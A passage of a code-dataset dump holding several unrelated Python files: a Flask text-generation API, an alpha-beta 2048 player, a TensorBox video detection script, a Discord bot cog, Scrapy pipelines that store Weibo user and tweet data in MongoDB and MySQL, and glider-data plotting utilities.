HTTPError(message, identifier, status_code)\n\n init_app(self.app)\n\n tc = self.app.test_client()\n\n r = tc.get('/')\n err = flask.json.loads(r.get_data())\n print(err)\n", "sub_path": "tests/test_core.py", "file_name": "test_core.py", "file_ext": "py", "file_size_in_byte": 591, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "flask_errors.HTTPError", "line_number": 18, "usage_type": "call"}, {"api_name": "flask_errors.init_app", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 25, "usage_type": "attribute"}]} +{"seq_id": "553484677", "text": "# -*- encoding: utf-8 -*-\nfrom flask import Flask, request, Response\nimport json\nimport numpy as np\nimport gpt_gen\nimport sys\nfrom datetime import datetime\nimport logging\napp = Flask(__name__)\napp.logger.setLevel(logging.INFO)\nport = 5000\nstyle = 0#0大白狗, 1散文\nif len(sys.argv)>1:\n port = int(sys.argv[1])\nmaxNext = 5\npath_next = 'model/nnlm/D_next.json'\npath_simi = 'model/nnlm/D_simi.json'\nD_simi = json.load(open(path_simi,'r',encoding='utf-8'))\nD_next = json.load(open(path_next,'r',encoding='utf-8'))\nD_simi = {k:json.loads(D_simi[k]) for k in D_simi}\nD_next = {k:json.loads(D_next[k]) for k in D_next}\n@app.route('/api/gen', methods=['POST'])\ndef test2():\n r = request.json\n data = r[\"input\"]\n if \"num\" in r:\n num = r[\"num\"]\n else:\n num = 5\n quick = False\n if \"quick\" in r:\n print(\"quick pattern\")\n if r[\"quick\"]==\"True\":\n quick = True\n app.logger.info(data)\n try:\n now = datetime.now()\n app.logger.info('time: {}'.format(now))\n result = gpt_gen.nnlm_modelpredict(D_simi,D_next,inputStr=[data],maxNext=maxNext,maxChoice=10,num=num)\n then = datetime.now()\n app.logger.info('time: {}'.format(then))\n #app.logger.info('time for : {}'.format(then - now))\n app.logger.info(\"input:{}\".format(data))\n app.logger.info(\"output:\\n{}\".format('\\n'.join(result)))\n response = {'message':'success','input':data,'result': result}\n except Exception as e:\n app.logger.error(\"error:\",e)\n response = {'message': 'error', 'input': data, 'result': None}\n response_pickled = json.dumps(response)\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n# start flask app\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=port)\n", "sub_path": "web/app_nnlm.py", "file_name": "app_nnlm.py", "file_ext": "py", "file_size_in_byte": 1809, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "gpt_gen.nnlm_modelpredict", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 50, "usage_type": "call"}]} +{"seq_id": "206398907", "text": "from BaseAI_3 import BaseAI\nfrom Grid_3 import Grid\nimport numpy as np\nimport time\nimport helper as helper\n\ndef maximize(grid, depth, start, first_move, alpha, beta):\n if grid.canMove() == False or time.clock() - start > 0.2 or depth == 0:\n return (grid , helper.score(grid), first_move)\n\n best_max = (None, -np.inf)\n moves = grid.getAvailableMoves()\n for move in moves:\n if depth == 4:\n first_move = move\n child = helper.get_max_child(move, grid)\n max_tuple = minimize(child, depth - 1, start, first_move, alpha, beta)\n if max_tuple[1] > best_max[1]:\n best_max = max_tuple\n if max_tuple[1] >= beta:\n break\n if max_tuple[1] > alpha:\n alpha = max_tuple[1]\n return best_max\n\ndef minimize(grid, depth, start, first_move, alpha, beta):\n if grid.canMove() == False or time.clock() - start > 0.2 or depth == 0:\n return (grid ,helper.score(grid), first_move)\n\n best_min = (None, np.inf)\n free_cells = grid.getAvailableCells()\n for value in [2,4]:\n for pos in free_cells:\n child = helper.get_min_child(pos, value, grid)\n min_tuple = maximize(child, depth - 1, start, first_move, alpha, beta)\n if min_tuple[1] < best_min[1]:\n best_min = min_tuple\n if min_tuple[1] < beta:\n beta = min_tuple[1]\n if min_tuple[1] <= alpha:\n break\n return best_min", "sub_path": "P2/alphabeta.py", "file_name": "alphabeta.py", "file_ext": "py", "file_size_in_byte": 1471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.clock", "line_number": 8, "usage_type": "call"}, {"api_name": "helper.score", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 11, "usage_type": "attribute"}, {"api_name": "helper.get_max_child", "line_number": 16, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 27, "usage_type": "call"}, {"api_name": "helper.score", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 30, "usage_type": "attribute"}, {"api_name": "helper.get_min_child", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "632446269", "text": "#### My import\n\nimport argparse\nimport Utils_Image\nimport Utils_Video\nimport Utils_Tensorbox\nimport Classes\nimport progressbar\nimport time\nimport os\n\n######### MAIN ###############\n\ndef main():\n '''\n Parse command line arguments and execute the code \n\n '''\n\n ######### TENSORBOX PARAMETERS\n\n\n start = time.time()\n\n parser = argparse.ArgumentParser()\n # parser.add_argument('--result_folder', default='summary_result/', type=str)\n # parser.add_argument('--summary_file', default='results.txt', type=str)\n parser.add_argument('--output_name', default='output.mp4', type=str)\n parser.add_argument('--hypes', default='./TENSORBOX/hypes/overfeat_rezoom.json', type=str)\n parser.add_argument('--weights', default='./TENSORBOX/data/save.ckpt-1250000', type=str)\n parser.add_argument('--perc', default=5, type=int)\n parser.add_argument('--path_video', default='ILSVRC2015_val_00013002.mp4', type=str)# required=True, type=str)\n\n args = parser.parse_args()\n\n # hypes_file = './hypes/overfeat_rezoom.json'\n # weights_file= './output/save.ckpt-1090000'\n\n path_video_folder = os.path.splitext(os.path.basename(args.path_video))[0]\n pred_idl = './%s/%s_val.idl' % (path_video_folder, path_video_folder)\n idl_filename=path_video_folder+'/'+path_video_folder+'.idl'\n frame_list=[]\n frame_list = Utils_Video.extract_idl_from_frames(args.path_video, args.perc, path_video_folder, 'frames/', idl_filename )\n\n progress = progressbar.ProgressBar(widgets=[progressbar.Bar('=', '[', ']'), ' ',progressbar.Percentage(), ' ',progressbar.ETA()])\n\n for image_path in progress(frame_list):\n Utils_Image.resizeImage(image_path)\n Utils_Image.resizeImage(-1)\n\n det_frame_list=Utils_Tensorbox.still_image_TENSORBOX_multiclass( frame_list, path_video_folder, args.hypes, args.weights, pred_idl)\n Utils_Video.make_video_from_list(args.output_name, det_frame_list)\n end = time.time()\n\n print(\"Elapsed Time:%d Seconds\"%(end-start))\n print(\"Running Completed with Success!!!\")\n\nif __name__ == '__main__':\n main()\n\n\n\n\n", "sub_path": "VID_tensorbox_multi_class.py", "file_name": "VID_tensorbox_multi_class.py", "file_ext": "py", "file_size_in_byte": 2078, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.time", "line_number": 23, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 39, "usage_type": "call"}, {"api_name": "Utils_Video.extract_idl_from_frames", "line_number": 43, "usage_type": "call"}, {"api_name": "progressbar.ProgressBar", "line_number": 45, "usage_type": "call"}, {"api_name": "progressbar.Bar", "line_number": 45, "usage_type": "call"}, {"api_name": "progressbar.Percentage", "line_number": 45, "usage_type": "call"}, {"api_name": "progressbar.ETA", "line_number": 45, "usage_type": "call"}, {"api_name": "Utils_Image.resizeImage", "line_number": 48, "usage_type": "call"}, {"api_name": "Utils_Image.resizeImage", "line_number": 49, "usage_type": "call"}, {"api_name": "Utils_Tensorbox.still_image_TENSORBOX_multiclass", "line_number": 51, "usage_type": "call"}, {"api_name": "Utils_Video.make_video_from_list", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "79102859", "text": "import json\nimport random\nimport time\n\nimport discord\nimport requests\nfrom discord.ext import commands\n\nimport utilities.kat_logger as logger\nimport utilities.kat_utilities as utilities\n\n\nclass Fun(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.log = logger.get_logger(self.qualified_name)\n self.log.info(f\"Loaded {self.qualified_name}\")\n\n\n self.megu_cache_time = 99999999999\n r = requests.get(\n \"https://api.tenor.com/v1/search?q=megumin&key=4KDPUPUVOVRW&limit=8&anon_id=312ced313baf42079d1588df7e032c69\")\n if r.status_code == 200:\n # load the GIFs using the urls for the smaller GIF sizes\n self.megumin_gif_cache = json.loads(r.content)\n else:\n self.megumin_gif_cache = []\n\n #### Hit or miss\n @commands.command(aliases=['huh'])\n async def hitormiss(self, ctx):\n await ctx.send(\n \"**I guess they never miss, huh?**\\nhttps://cdn.discordapp.com/attachments/569186352583933953/570671772320661544/nico1.mp4\")\n\n @commands.command()\n async def megumin(self, ctx):\n\n if len(self.megumin_gif_cache) is 0 or time.time() - self.megu_cache_time > 10000:\n self.megu_cache_time = time.time()\n r = requests.get(\n \"https://api.tenor.com/v1/search?q=megumin&key=4KDPUPUVOVRW&limit=8&anon_id=312ced313baf42079d1588df7e032c69\")\n\n if r.status_code == 200:\n # load the GIFs using the urls for the smaller GIF sizes\n self.log.info(\"Downloaded megumin gifs to cache\")\n self.megumin_gif_cache = json.loads(r.content)\n\n gif = \\\n self.megumin_gif_cache['results'][random.randrange(0, len(self.megumin_gif_cache['results']))]['media'][0][\n 'gif']['url']\n\n embed = discord.Embed(title=(utilities.get_response('command_fun_megumin_embed_title')))\n embed.set_image(url=gif)\n embed.colour = discord.Color.red()\n await ctx.send(embed=embed)\n\n\n\n\n\n # cog framework\n def cog_unload(self):\n self.log.info(f\"Unloading {self.qualified_name}\")\n self.log.destroy()\n\n async def cog_command_error(self, ctx, error):\n self.log.warn(f\"{ctx.command} encountered an error: {error}\")\n\n async def cog_before_invoke(self, ctx):\n self.log.info(f\"{ctx.author.name} | {ctx.author.id} Performed {ctx.command}\")\n\ndef setup(bot):\n bot.add_cog(Fun(bot))", "sub_path": "cogs/fun.py", "file_name": "fun.py", "file_ext": "py", "file_size_in_byte": 2440, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 13, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "utilities.kat_logger.get_logger", "line_number": 16, "usage_type": "call"}, {"api_name": "utilities.kat_logger", "line_number": 16, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 30, "usage_type": "name"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 49, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 52, "usage_type": "call"}, {"api_name": "utilities.kat_utilities.get_response", "line_number": 52, "usage_type": "call"}, {"api_name": "utilities.kat_utilities", "line_number": 52, "usage_type": "name"}, {"api_name": "discord.Color.red", "line_number": 54, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 54, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.command", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "396918424", "text": "from weibospider.items import TweetsItem,BaseInfoItem\nimport logging\n\nimport MySQLdb\nfrom twisted.enterprise import adbapi\nimport MySQLdb.cursors\n\nimport pymongo\n\n\nclass MongoPipeline(object):\n userinfo = 'users'\n Tweets = 'tweets'\n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DATABASE')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n if isinstance(item, BaseInfoItem):\n self.db[self.userinfo].insert(dict(item))\n if isinstance(item, TweetsItem):\n self.db[self.Tweets].insert(dict(item))\n\n\n\nclass MysqlPipeline(object):\n def __init__(self,settings):\n self.conn = MySQLdb.connect(settings.get('MYSQL_HOST'), settings.get('MYSQL_USER'), settings.get('MYSQL_PASSWORD'),\n settings.get('MYSQL_DBNAME'), charset=\"utf8mb4\", use_unicode=True)\n self.cursor = self.conn.cursor()\n\n @classmethod\n def from_settings(cls, settings):\n return cls(settings)\n\n def close_spider(self, spider):\n self.cursor.close()\n self.conn.close()\n\n def process_item(self, item, spider):\n sql = ''\n if isinstance(item, BaseInfoItem):\n for key in BaseInfoItem.fields:\n if item.get(key)==None:\n item[key]=''\n sql, params = self.insert_base_info(item)\n elif isinstance(item, TweetsItem):\n for key in TweetsItem.fields:\n if item.get(key)==None:\n item[key]=''\n if item['IsTransfer'] == 0 and item['ImageUrl']:\n if len(item['ImageUrl']) > 0:\n if 'bmiddle' in item['ImageUrl']:\n sql, params = self.insert_tweets(item)\n try:\n if sql:\n self.cursor.execute(sql, params)\n self.conn.commit()\n except Exception as e:\n logging.info(e)\n self.conn.rollback()\n\n\n def insert_base_info(self,item):\n insert_sql = '''\n insert into weibo_userinfo(ID, NickName,Gender,Location,BriefIntroduction,Birthday,Tweets,Follows,Fans,Viplevel,Talente,Authentication,AuthenticationInfo,Url)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n '''\n params = (\n item['Id'], item['NickName'], item['Gender'], item['Location'], item['BriefIntroduction'], item['Birthday'],\n item['Tweets'], item['Follows'], item['Fans'], item['Viplevel'], item['Talente'], item['Authentication'],\n item['AuthenticationInfo'], item['Url'])\n return insert_sql,params\n\n\n\n def insert_tweets(self, item):\n insert_sql = '''\n insert into weibo_tweets(wbid,ID, IsTransfer, Content, Likes,Transfer,Comment,PubTime,Tools,Co_oridinates, ImageUrl)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n '''\n params=(item['id'],item['Id'],item['IsTransfer'],item['Content'],item['Like'],item['Transfer'],item['Comment'],item['PubTime'],item['Tools'],item['Co_oridinates'],item['ImageUrl'])\n return insert_sql, params\n\n\n\n\n\n\nclass MysqlTwistedPipline(object):\n def __init__(self, dbpool):\n self.dbpool = dbpool\n\n @classmethod\n def from_settings(cls, settings):\n dbparms = dict(\n host = settings[\"MYSQL_HOST\"],\n db = settings[\"MYSQL_DBNAME\"],\n user = settings[\"MYSQL_USER\"],\n passwd = settings[\"MYSQL_PASSWORD\"],\n charset='utf8mb4',\n cursorclass=MySQLdb.cursors.DictCursor,\n use_unicode=True,\n )\n dbpool = adbapi.ConnectionPool(\"MySQLdb\", **dbparms)\n return cls(dbpool)\n\n def close_spider(self, spider):\n self.dbpool.close()\n\n def process_item(self, item, spider):\n #使用twisted将mysql插入变成异步执行\n if isinstance(item, BaseInfoItem):\n for key in BaseInfoItem.fields:\n if item.get(key)==None:\n item[key]=''\n query = self.dbpool.runInteraction(self.insert_base_info, item)\n query.addErrback(self.handle_error, item)\n elif isinstance(item, TweetsItem):\n for key in TweetsItem.fields:\n if item.get(key)==None:\n item[key]=''\n query = self.dbpool.runInteraction(self.insert_tweets, item)\n query.addErrback(self.handle_error, item)\n # elif isinstance(item, TweetsInfoItem):\n # query = self.dbpool.runInteraction(self.update_tweets_info, item)\n # query.addErrback(self.handle_error, item) #处理异常\n\n def handle_error(self, failure, item):\n # 处理异步插入的异常\n logging.debug(failure)\n\n\n def insert_base_info(self, cursor, item):\n insert_sql='''\n insert into userinfo(ID, 昵称,性别,地区,简介,生日,微博数,关注数,粉丝数,会员等级,达人,认证,认证信息,Url)\n VALUES (%s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s)\n '''\n params = (item['Id'], item['NickName'], item['Gender'], item['Location'], item['BriefIntroduction'], item['Birthday'],\n item['Tweets'],item['Follows'],item['Fans'],item['Viplevel'], item['Talente'], item['Authentication'],\n item['AuthenticationInfo'], item['Url'])\n cursor.execute(insert_sql, params)\n\n\n def insert_tweets(self, cursor, item):\n insert_sql = '''\n insert into tweets(wbid,ID, IsTransfer, Content, Likes,Transfer,Comment,PubTime,Tools,Co_oridinates )\n VALUES (%s,%s, %s, %s, %s, %s, %s, %s, %s, %s)\n '''\n params=(item['id'],item['Id'],item['IsTransfer'],item['Content'],item['Like'],item['Transfer'],item['Comment'],item['PubTime'],item['Tools'],item['Co_oridinates'])\n cursor.execute(insert_sql, params)\n\n", "sub_path": "weibospider/weibospider/pipelines.py", "file_name": "pipelines.py", "file_ext": "py", "file_size_in_byte": 6307, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymongo.MongoClient", "line_number": 27, "usage_type": "call"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 34, "usage_type": "argument"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 36, "usage_type": "argument"}, {"api_name": "MySQLdb.connect", "line_number": 43, "usage_type": "call"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 57, "usage_type": "argument"}, {"api_name": "weibospider.items.BaseInfoItem.fields", "line_number": 58, "usage_type": "attribute"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 58, "usage_type": "name"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 62, "usage_type": "argument"}, {"api_name": "weibospider.items.TweetsItem.fields", "line_number": 63, "usage_type": "attribute"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 63, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 75, "usage_type": "call"}, {"api_name": "MySQLdb.cursors", "line_number": 117, "usage_type": "attribute"}, {"api_name": "twisted.enterprise.adbapi.ConnectionPool", "line_number": 120, "usage_type": "call"}, {"api_name": "twisted.enterprise.adbapi", "line_number": 120, "usage_type": "name"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 128, "usage_type": "argument"}, {"api_name": "weibospider.items.BaseInfoItem.fields", "line_number": 129, "usage_type": "attribute"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 129, "usage_type": "name"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 134, "usage_type": "argument"}, {"api_name": "weibospider.items.TweetsItem.fields", "line_number": 135, "usage_type": "attribute"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 135, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "533554397", "text": "from __future__ import print_function\n\n\ndef _process_2D_plot_args(args, gridding_dz=1):\n\n from numpy import array, ma, nan, ndarray, nanmax, arange\n from pandas import DataFrame, Series\n from xarray import DataArray\n from . import tools\n\n if len(args) == 3:\n x = array(args[0])\n y = array(args[1]).astype(float)\n z = args[2]\n if isinstance(z, ma.MaskedArray):\n z[z.mask] = nan\n else:\n z = ma.masked_invalid(array(z)).astype(float)\n\n if (x.size == y.size) & (len(z.shape) == 1):\n bins = arange(0, nanmax(y), gridding_dz)\n df = tools.bin_depths(z, x, y, bins=bins)\n x = df.columns\n y = df.index\n z = ma.masked_invalid(df.values)\n return x, y, z\n\n elif len(args) == 1:\n z = args[0]\n if isinstance(z, DataArray):\n z = z.to_series().unstack()\n elif isinstance(z, (ndarray, Series)):\n if z.ndim == 2:\n z = DataFrame(z)\n else:\n raise IndexError('The input must be a 2D DataFrame or ndarray')\n\n x = z.columns.values\n y = z.index.values\n z = ma.masked_invalid(z.values).astype(float)\n\n return x, y, z\n\n\ndef save_figures_to_pdf(fig_list, pdf_name, **savefig_kwargs):\n import matplotlib.backends.backend_pdf\n from matplotlib import pyplot as plt\n\n pdf = matplotlib.backends.backend_pdf.PdfPages(pdf_name)\n for fig in fig_list: # will open an empty extra figure :(\n pdf.savefig(fig.number, dpi=120)\n pdf.close()\n plt.close('all')\n\n\nclass plot_functions(object):\n @staticmethod\n def __new__(*args, **kwargs):\n\n if len(args) > 1:\n args = args[1:]\n return plot_functions.pcolormesh(*args, **kwargs)\n\n @staticmethod\n def pcolormesh(*args, **kwargs):\n \"\"\"\n Plot a section plot of the dives with x-time and y-depth and\n z-variable. The data can be linearly interpolated to fill missing\n depth values. The number of points to interpolate can be set with\n interpolate_dist.\n\n *args can be:\n - same length x, y, z. Will be gridded with depth of 1 meter.\n - x(m), y(n), z(n, m) arrays\n - z DataFrame where indicies are depth and columns are dives\n - z DataArray where dim0 is dives and dim1 is depth\n **kwargs can be:\n - ax - give an axes to the plotting function\n - robust - use the 0.5 and 99.5 percentile to set color limits\n - gridding_dz - gridding depth [default 1]\n\n The **kwargs can be anything that gets passed to plt.pcolormesh.\n Note that the colour is scaled to 1 and 99% of z.\n \"\"\"\n from matplotlib.pyplot import colorbar, subplots\n from numpy import datetime64, nanpercentile\n from datetime import datetime\n\n ax = kwargs.pop('ax', None)\n robust = kwargs.pop('robust', False)\n gridding_dz = kwargs.pop('gridding_dz', 1)\n\n x, y, z = _process_2D_plot_args(args, gridding_dz=gridding_dz)\n\n x_time = isinstance(x[0], (datetime, datetime64))\n\n if robust & (('vmin' not in kwargs) | ('vmax' not in kwargs)):\n kwargs['vmin'] = nanpercentile(z.data, 0.5)\n kwargs['vmax'] = nanpercentile(z.data, 99.5)\n\n if ax is None:\n fig, ax = subplots(1, 1, figsize=[11, 4])\n else:\n fig = ax.get_figure()\n\n im = ax.pcolormesh(x, y, z, rasterized=True, **kwargs)\n ax.cb = colorbar(mappable=im, pad=0.02, ax=ax)\n ax.set_xlim(x.min(), x.max())\n ax.set_ylim(y.max(), y.min())\n ax.set_ylabel('Depth (m)')\n ax.set_xlabel('Date' if x_time else 'Dives')\n\n [tick.set_rotation(45) for tick in ax.get_xticklabels()]\n fig.tight_layout()\n\n return ax\n\n @staticmethod\n def contourf(*args, **kwargs):\n \"\"\"\n Plot a section plot of the dives with x-time and y-depth and\n z-variable. The data can be linearly interpolated to fill missing\n depth values. The number of points to interpolate can be set with\n interpolate_dist.\n\n *args can be:\n - same length x, y, z. Will be gridded with depth of 1 meter.\n - x(m), y(n), z(n, m) arrays\n - z DataFrame where indicies are depth and columns are dives\n - z DataArray where dim0 is dives and dim1 is depth\n **kwargs can be:\n - ax - give an axes to the plotting function\n - robust - use the 0.5 and 99.5 percentile to set color limits\n - gridding_dz - gridding depth [default 1]\n\n The **kwargs can be anything that gets passed to plt.pcolormesh.\n Note that the colour is scaled to 1 and 99% of z.\n \"\"\"\n\n from matplotlib.pyplot import colorbar, subplots\n from numpy import percentile, datetime64\n from datetime import datetime\n\n ax = kwargs.pop('ax', None)\n robust = kwargs.pop('robust', False)\n gridding_dz = kwargs.pop('gridding_dz', 1)\n\n x, y, z = _process_2D_plot_args(args, gridding_dz=gridding_dz)\n\n x_time = isinstance(x[0], (datetime, datetime64))\n\n if robust & (('vmin' not in kwargs) | ('vmax' not in kwargs)):\n kwargs['vmin'] = percentile(z[~z.mask], 0.5)\n kwargs['vmax'] = percentile(z[~z.mask], 99.5)\n\n if ax is None:\n fig, ax = subplots(1, 1, figsize=[11, 4])\n else:\n fig = ax.get_figure()\n\n im = ax.contourf(x, y, z, **kwargs)\n ax.cb = colorbar(mappable=im, pad=0.02, ax=ax)\n ax.set_xlim(x.min(), x.max())\n ax.set_ylim(y.max(), y.min())\n ax.set_ylabel('Depth (m)')\n ax.set_xlabel('Date' if x_time else 'Dives')\n\n [tick.set_rotation(45) for tick in ax.get_xticklabels()]\n fig.tight_layout()\n\n return ax\n\n @staticmethod\n def scatter(x, y, z, ax=None, robust=False, **kwargs):\n from matplotlib.pyplot import colorbar, subplots\n from numpy import ma, nanpercentile, datetime64, array, nanmin, nanmax\n from datetime import datetime\n\n x = array(x)\n y = array(y)\n z = ma.masked_invalid(z)\n\n x_time = isinstance(x[0], (datetime, datetime64))\n\n if robust:\n kwargs['vmin'] = nanpercentile(z, 0.5)\n kwargs['vmax'] = nanpercentile(z, 99.5)\n\n if ax is None:\n fig, ax = subplots(1, 1, figsize=[11, 4])\n else:\n fig = ax.get_figure()\n im = ax.scatter(x, y, c=z, rasterized=True, **kwargs)\n\n ax.cb = colorbar(mappable=im, pad=0.02, ax=ax)\n ax.set_xlim(nanmin(x), nanmax(x))\n ax.set_ylim(nanmax(y), nanmin(y))\n ax.set_ylabel('Depth (m)')\n ax.set_xlabel('Date' if x_time else 'Dives')\n\n [tick.set_rotation(45) for tick in ax.get_xticklabels()]\n fig.tight_layout()\n\n return ax\n\n @staticmethod\n def bin_size(depth, **hist_kwargs):\n from matplotlib.pyplot import subplots, colorbar\n from matplotlib.colors import LogNorm\n from numpy import abs, diff, isnan, array\n\n depth = array(depth)\n\n x = abs(diff(depth))\n y = depth[1:]\n m = ~(isnan(x) | isnan(y))\n x, y = x[m], y[m]\n\n fig, ax = subplots(1, 1, figsize=[4, 6])\n im = ax.hist2d(x, y, bins=50, norm=LogNorm(),\n rasterized=True, **hist_kwargs)[-1]\n ax.set_ylim(ax.get_ylim()[::-1])\n ax.set_ylabel('Depth (m)')\n ax.set_xlabel('$\\Delta$ Depth (m)')\n\n cb = colorbar(mappable=im, ax=ax, fraction=0.1, pad=0.05)\n cb.set_label('Measurement count')\n\n fig.tight_layout()\n return ax\n\n\nif __name__ == '__main__':\n pass\n \"fun people\"\n\n", "sub_path": "buoyancy_glider_utils/plot.py", "file_name": "plot.py", "file_ext": "py", "file_size_in_byte": 7778, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.ma.MaskedArray", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.ma", "line_number": 15, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 16, "usage_type": "name"}, {"api_name": "numpy.ma.masked_invalid", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.ma.masked_invalid", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 25, "usage_type": "name"}, {"api_name": "xarray.DataArray", "line_number": 30, "usage_type": "argument"}, {"api_name": "numpy.ndarray", "line_number": 32, "usage_type": "name"}, {"api_name": "pandas.Series", "line_number": 32, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.ma.masked_invalid", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_pdf.backends.backend_pdf.PdfPages", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.backends", "line_number": 49, "usage_type": "attribute"}, {"api_name": "matplotlib.backends.backend_pdf", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.datetime64", "line_number": 95, "usage_type": "name"}, {"api_name": "numpy.nanpercentile", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.nanpercentile", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 107, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.datetime64", "line_number": 150, "usage_type": "name"}, {"api_name": "numpy.percentile", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 154, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 179, "usage_type": "call"}, 